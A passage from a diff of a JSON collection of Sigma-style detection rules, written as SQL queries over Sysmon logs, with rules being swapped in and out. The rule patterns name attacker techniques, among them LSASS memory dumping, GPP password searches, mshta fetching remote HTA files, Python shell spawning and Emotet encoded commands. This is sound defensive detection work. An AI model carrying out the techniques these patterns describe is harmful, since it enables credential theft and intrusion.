a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE 
'%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], 
"falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + 
"attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": 
"b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR 
(CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE 
'\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument 
containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 
'%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE 
